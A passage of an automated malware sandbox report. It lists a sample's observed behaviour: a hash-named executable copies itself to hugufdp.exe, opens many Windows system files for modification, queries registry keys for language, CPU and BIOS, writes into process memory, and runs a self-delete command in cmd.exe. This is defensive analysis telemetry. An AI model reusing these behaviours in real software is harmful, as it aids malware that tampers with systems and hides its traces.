| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-s..ets.icons.searchapp_31bf3856ad364e35_10.0.19041.3996_none_8d465235315175e4\f\smalltile.scale-150.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\DropAccept.scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_hyperv-vmchipset_31bf3856ad364e35_10.0.19041.4355_none_49f7f1fb41e2907c\VmChipset Third-Party Notices.txt | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\DefaultSystemNotification.scale-125.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_systemresource-wind..-ui-accountscontrol_31bf3856ad364e35_10.0.19041.1_none_8805ef3af31f4b8c\Outlook.Theme-Dark_Scale-125.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_ppi-ppiskype-c-a_31bf3856ad364e35_10.0.19041.3636_none_e69f3bd188919f86\f\available_oof2x1.scale-180.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackup\Assets\StoreLogo.scale-400.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\instructionPointerGlyph.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\js\autopilotwhitegloveresult-page.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.4474_none_8f6f71a24c482e0d\System.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\WiFiNetworkManagerWarningToast.scale-400.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\Formatter\workerMessaging.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-w..aincompat.resources_31bf3856ad364e35_10.0.19041.1_fr-fr_aa50e6949c4270bb.manifest | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-apprep-chxapp.appxmain_31bf3856ad364e35_10.0.19041.3636_none_ac810a70c7943041\f\templatestyle.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\app.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\x86_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_10.0.19041.4529_fr-ca_706fc2143064e6f0\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.AsyncTextService_8wekyb3d8bbwe\Assets\Square44x44Logo.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..iagnostic.resources_31bf3856ad364e35_10.0.19041.1_de-de_93077b1bb6202083\CL_LocalizationData.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.19041.423_none_d93ee361fbbc8f0a\SquareTile310x150.scale-200.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-s..in.assets.searchapp_31bf3856ad364e35_10.0.19041.3636_none_0ec6635ad8612aaf\f\smallicon.targetsize-16.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\foreground.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..er.appxmain.ratings_31bf3856ad364e35_10.0.19041.1_none_ff46bbc9afee54c5\RatingStars49.contrast-white_scale-200.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.4355_none_c25ba12abfc23968\f\tabletmode.scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\js\oobeprovisioningentry-vm.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\console.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\addXHRBreakpoint.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.4355_none_70ae1507b206e5a7\f\splashscreen.contrast-white_scale-100.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\VisualProfiler\js\CpuUsage\Grid.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\unifiedEnrollmentProvisioningProgressPage.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\StateMachine.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-64.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemResources\Windows.UI.Shell\Images\RequestedDownloadsLargeCloudIcon.scale-150.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..er.appxmain.ratings_31bf3856ad364e35_10.0.19041.1_none_ff46bbc9afee54c5\RatingStars38.contrast-black_scale-200.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\wow64_microsoft-windows-s..tore-main.resources_31bf3856ad364e35_10.0.19041.4529_nb-no_ba31a636ad7073a3.manifest | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-a..g-whatsnew.appxmain_31bf3856ad364e35_10.0.19041.4355_none_ee89351905ec7ddf\f\newforyoubadgelogo.scale-100_contrast-black.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_10.0.19041.4529_ar-sa_7f51b48ac5d79fc0\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\wow64_windowssearchengine_31bf3856ad364e35_7.0.19041.4355_none_f69176c636ff34b8\f\search.protocolhandler.mapi2.dll | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\htmlMode.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\CellularToast.scale-125_contrast-white.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-edp-task_31bf3856ad364e35_10.0.19041.1023_none_67d9ae9ccb89c9b7\@bitlockertoastimage.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.4474_none_08f8dfcf0c193741\NarratorUWPSquare44x44Logo.targetsize-60_contrast-black.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\DiagTrack\Settings\utc.tracing.json | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_10.0.19041.4529_th-th_9e177be6c44cece3\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-i..edia-base.resources_31bf3856ad364e35_10.0.19041.3636_ro-ro_5cab57ff22d2bb12\f\vofflps.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.4474_none_fb628aaf7e87b8df\n\cbs\screenclipping\assets\storelogo.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\r\ssprerror-page.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.powershell.archive.resources_31bf3856ad364e35_10.0.19041.1_en-us_c64fb0a26d1f3fed\ArchiveResources.psd1 | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\discovery.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\cache\Local\Desktop\17.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\settings-desktop.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_10.0.19041.4529_lv-lv_6a52eae10ae28d05\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.19041.4529_tr-tr_05a82ecb196d30f1\f\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\f\snapshottileview.css | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets\Square150x150Logo.scale-125.png | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-l..terprises.resources_31bf3856ad364e35_10.0.19041.1_it-it_039386304bc8adc1\license.rtf | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\localngc.js | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~19041.4529.1.9\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_7769e00c02e06184\f\provisionedapplications.svg | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3785588363-1079601362-4184885025-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\hugufdp.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\hugufdp.exe
C:\Users\Admin\AppData\Roaming\hugufdp.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffc499546f8,0x7ffc49954708,0x7ffc49954718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
